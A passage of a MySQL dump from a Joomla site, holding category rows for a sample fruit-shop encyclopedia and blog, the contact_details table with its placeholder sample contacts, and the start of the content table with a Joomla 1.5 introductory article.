00:00:00',0,'*',1),(43,68,37,28,29,4,'sample-data-contact/shop-site/fruit-encyclopedia/f','com_contact','F','f','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(44,69,37,30,31,4,'sample-data-contact/shop-site/fruit-encyclopedia/g','com_contact','G','g','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(45,70,37,32,33,4,'sample-data-contact/shop-site/fruit-encyclopedia/h','com_contact','H','h','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(46,71,37,34,35,4,'sample-data-contact/shop-site/fruit-encyclopedia/i','com_contact','I','i','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(47,72,37,36,37,4,'sample-data-contact/shop-site/fruit-encyclopedia/j','com_contact','J','j','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(48,73,37,38,39,4,'sample-data-contact/shop-site/fruit-encyclopedia/k','com_contact','K','k','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(49,74,37,40,41,4,'sample-data-contact/shop-site/fruit-encyclopedia/l','com_contact','L','l','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(50,75,37,42,43,4,'sample-data-contact/shop-site/fruit-encyclopedia/m','com_contact','M','m','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(51,76,37,44,45,4,'sample-data-contact/shop-site/fruit-encyclopedia/n','com_contact','N','n','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(52,77,37,46,47,4,'sample-data-contact/shop-site/fruit-encyclopedia/o','com_contact','O','o','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(53,78,37,48,49,4,'sample-data-contact/shop-site/fruit-encyclopedia/p','com_contact','P','p','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(54,79,37,50,51,4,'sample-data-contact/shop-site/fruit-encyclopedia/q','com_contact','Q','q','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(55,80,37,52,53,4,'sample-data-contact/shop-site/fruit-encyclopedia/r','com_contact','R','r','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(56,81,37,54,55,4,'sample-data-contact/shop-site/fruit-encyclopedia/s','com_contact','S','s','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(57,82,37,56,57,4,'sample-data-contact/shop-site/fruit-encyclopedia/t','com_contact','T','t','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(58,83,37,58,59,4,'sample-data-contact/shop-site/fruit-encyclopedia/u','com_contact','U','u','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(59,84,37,60,61,4,'sample-data-contact/shop-site/fruit-encyclopedia/v','com_contact','V','v','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(60,85,37,62,63,4,'sample-data-contact/shop-site/fruit-encyclopedia/w','com_contact','W','w','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(61,86,37,64,65,4,'sample-data-contact/shop-site/fruit-encyclopedia/x','com_contact','X','x','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(62,87,37,66,67,4,'sample-data-contact/shop-site/fruit-encyclopedia/y','com_contact','Y','y','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(63,88,37,68,69,4,'sample-data-contact/shop-site/fruit-encyclopedia/z','com_contact','Z','z','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(77,169,1,79,80,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(79,179,1,81,90,1,'blog','com_content','Blog','blog','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2015-02-02 06:12:46',0,'0000-00-00 00:00:00',0,'*',1),(80,191,79,82,83,2,'blog/news','com_content','News','news','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2015-02-02 18:42:14',864,'2015-02-02 18:42:30',0,'*',1),(81,192,79,84,85,2,'blog/tutorial','com_content','Tutorial','tutorial','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2015-02-02 18:42:46',0,'0000-00-00 00:00:00',0,'*',1),(82,193,79,86,87,2,'blog/review','com_content','Review','review','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2015-02-02 18:42:56',0,'0000-00-00 00:00:00',0,'*',1),(83,194,79,88,89,2,'blog/updates','com_content','Updates','updates','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2015-02-02 18:43:15',0,'0000-00-00 00:00:00',0,'*',1),(84,217,1,91,92,1,'new-category','com_imagerecycle','COM_IMAGERECYCLE_INSTALLER_NEW_CATEGORY','new-category','','',1,0,'0000-00-00 00:00:00',1,'','','','',309,'2016-08-21 16:24:20',0,'2016-08-21 16:24:20',0,'*',1),(85,221,1,93,94,1,'headers','com_djimageslider','Headers','headers','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2016-08-22 14:41:39',0,'2016-08-22 14:41:39',0,'*',1);
/*!40000 ALTER TABLE `vzx9b_categories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_contact_details`
--
DROP TABLE IF EXISTS `vzx9b_contact_details`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_contact_details` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
`con_position` varchar(255) DEFAULT NULL,
`address` mediumtext DEFAULT NULL,
`suburb` varchar(100) DEFAULT NULL,
`state` varchar(100) DEFAULT NULL,
`country` varchar(100) DEFAULT NULL,
`postcode` varchar(100) DEFAULT NULL,
`telephone` varchar(255) DEFAULT NULL,
`fax` varchar(255) DEFAULT NULL,
`misc` longtext DEFAULT NULL,
`image` varchar(255) DEFAULT NULL,
`email_to` varchar(255) DEFAULT NULL,
`default_con` tinyint(1) unsigned NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` mediumtext NOT NULL,
`user_id` int(11) NOT NULL DEFAULT 0,
`catid` int(11) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`mobile` varchar(255) NOT NULL DEFAULT '',
`webpage` varchar(255) NOT NULL DEFAULT '',
`sortname1` varchar(255) NOT NULL DEFAULT '',
`sortname2` varchar(255) NOT NULL DEFAULT '',
`sortname3` varchar(255) NOT NULL DEFAULT '',
`language` varchar(7) NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`metakey` mediumtext NOT NULL,
`metadesc` mediumtext NOT NULL,
`metadata` mediumtext NOT NULL,
`featured` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Set if article is featured.',
`xreference` varchar(50) NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`version` int(10) unsigned NOT NULL DEFAULT 1,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`published`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_featured_catid` (`featured`,`catid`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_contact_details`
--
LOCK TABLES `vzx9b_contact_details` WRITE;
/*!40000 ALTER TABLE `vzx9b_contact_details` DISABLE KEYS */;
INSERT INTO `vzx9b_contact_details` VALUES (1,'Contact Name Here','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','<p>Information about or by the contact.</p>','images/powered_by.png','email@example.com',1,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,16,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,19),(2,'Webmaster','webmaster','','','','','','','','','','','webmaster@example.com',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,34,1,'','','','','','en-GB','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,2),(3,'Owner','owner','','','','','','','','','<p>I\'m the owner of this store.</p>','','',0,-2,0,'0000-00-00 00:00:00',2,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,1),(4,'Buyer','buyer','','','','','','','','','<p>I am in charge of buying fruit. If you sell good fruit, contact me.</p>','','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"0\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,3),(5,'Bananas','bananas','Scientific Name: Musa','Image Credit: Enzik\r\nRights: Creative Commons Share Alike Unported 3.0\r\nSource: http://commons.wikimedia.org/wiki/File:Bananas_-_Morocco.jpg','','Type: Herbaceous','Large Producers: India, China, Brasil','','','','<p>Bananas are a great source of potassium.</p>\r\n<p> </p>','images/sampledata/fruitshop/bananas_2.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"show_with_link\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"1\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"1\",\"show_postcode\":\"\",\"show_country\":\"1\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Banana English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Banana\",\"linkb_name\":\"Wikipedia: \\u0939\\u093f\\u0928\\u094d\\u0926\\u0940 \\u0915\\u0947\\u0932\\u093e\",\"linkb\":\"http:\\/\\/hi.wikipedia.org\\/wiki\\/%E0%A4%95%E0%A5%87%E0%A4%B2%E0%A4%BE\",\"linkc_name\":\"Wikipedia:Banana Portugu\\u00eas\",\"linkc\":\"http:\\/\\/pt.wikipedia.org\\/wiki\\/Banana\",\"linkd_name\":\"Wikipedia: \\u0411\\u0430\\u043d\\u0430\\u043d \\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439\",\"linkd\":\"http:\\/\\/ru.wikipedia.org\\/\\u0411\\u0430\\u043d\\u0430\\u043d\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,39,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,1),(6,'Apples','apples','Scientific Name: Malus domestica','Image Credit: Fievet\r\nRights: Public Domain\r\nSource: http://commons.wikimedia.org/wiki/File:Pommes_vertes.JPG','','Family: Rosaceae','Large: Producers: China, United States','','','','<p>Apples are a versatile fruit, used for eating, cooking, and preserving.</p>\r\n<p>There are more that 7500 different kinds of apples grown around the world.</p>','images/sampledata/fruitshop/apple.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Apples English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Apple\",\"linkb_name\":\"Wikipedia: Manzana Espa\\u00f1ol \",\"linkb\":\"http:\\/\\/es.wikipedia.org\\/wiki\\/Manzana\",\"linkc_name\":\"Wikipedia: \\u82f9\\u679c \\u4e2d\\u6587\",\"linkc\":\"http:\\/\\/zh.wikipedia.org\\/zh\\/\\u82f9\\u679c\",\"linkd_name\":\"Wikipedia: Tofaa Kiswahili\",\"linkd\":\"http:\\/\\/sw.wikipedia.org\\/wiki\\/Tofaa\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,38,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,2),(7,'Tamarind','tamarind','Scientific Name: Tamarindus indica','Image Credit: Franz Eugen Köhler, Köhler\'s Medizinal-Pflanzen \r\nRights: Public Domain\r\nSource:http://commons.wikimedia.org/wiki/File:Koeh-134.jpg','','Family: Fabaceae','Large Producers: India, United States','','','','<p>Tamarinds are a versatile fruit used around the world. In its young form it is used in hot sauces; ripened it is the basis for many refreshing drinks.</p>\r\n<p> </p>','images/sampledata/fruitshop/tamarind.jpg','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Tamarind English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Tamarind\",\"linkb_name\":\"Wikipedia: \\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \\u09ac\\u09be\\u0982\\u09b2\\u09be \",\"linkb\":\"http:\\/\\/bn.wikipedia.org\\/wiki\\/\\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \",\"linkc_name\":\"Wikipedia: Tamarinier Fran\\u00e7ais\",\"linkc\":\"http:\\/\\/fr.wikipedia.org\\/wiki\\/Tamarinier\",\"linkd_name\":\"Wikipedia:Tamaline lea faka-Tonga\",\"linkd\":\"http:\\/\\/to.wikipedia.org\\/wiki\\/Tamaline\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,57,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,1),(8,'Shop Address','shop-address','','','Our City','Our Province','Our Country','','555-555-5555','','<p>Here are directions for how to get to our shop.</p>','','',0,-2,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,35,1,'','','','','','*','2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','2019-10-26 20:25:18','0000-00-00 00:00:00',1,2);
/*!40000 ALTER TABLE `vzx9b_contact_details` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_content`
--
DROP TABLE IF EXISTS `vzx9b_content`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_content` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`title` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`introtext` longtext NOT NULL,
`fulltext` longtext NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`images` mediumtext NOT NULL,
`urls` mediumtext NOT NULL,
`attribs` varchar(5120) NOT NULL,
`version` int(10) unsigned NOT NULL DEFAULT 1,
`ordering` int(11) NOT NULL DEFAULT 0,
`metakey` mediumtext NOT NULL,
`metadesc` mediumtext NOT NULL,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`metadata` mediumtext NOT NULL,
`featured` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Set if article is featured.',
`language` char(7) NOT NULL COMMENT 'The language code for the article.',
`xreference` varchar(50) NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`state`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_featured_catid` (`featured`,`catid`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`),
KEY `idx_alias` (`alias`(191))
) ENGINE=InnoDB AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_content`
--
LOCK TABLES `vzx9b_content` WRITE;
/*!40000 ALTER TABLE `vzx9b_content` DISABLE KEYS */;
INSERT INTO `vzx9b_content` VALUES (67,168,'What\'s New in 1.5?','whats-new-in-15','<p>This article deliberately archived as an example.</p><p>As with previous releases, Joomla! provides a unified and easy-to-use framework for delivering content for Web sites of all kinds. To support the changing nature of the Internet and emerging Web technologies, Joomla! required substantial restructuring of its core functionality and we also used this effort to simplify many challenges within the current user interface. Joomla! 1.5 has many new features.</p>\r\n<p style=\"margin-bottom: 0in;\">In Joomla! 1.5, you\'\'ll notice:</p>\r\n<ul>\r\n<li>Substantially improved usability, manageability, and scalability far beyond the original Mambo foundations</li>\r\n<li>Expanded accessibility to support internationalisation, double-byte characters and right-to-left support for Arabic, Farsi, and Hebrew languages among others</li>\r\n<li>Extended integration of external applications through Web services</li>\r\n<li>Enhanced content delivery, template and presentation capabilities to support accessibility standards and content delivery to any destination</li>\r\n<li>A more sustainable and flexible framework for Component and Extension developers</li>\r\n<li>Backward compatibility with previous releases of Components, Templates, Modules, and other Extensions</li>\r\n</ul>','',2,9,'2011-01-01 00:00:01',309,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 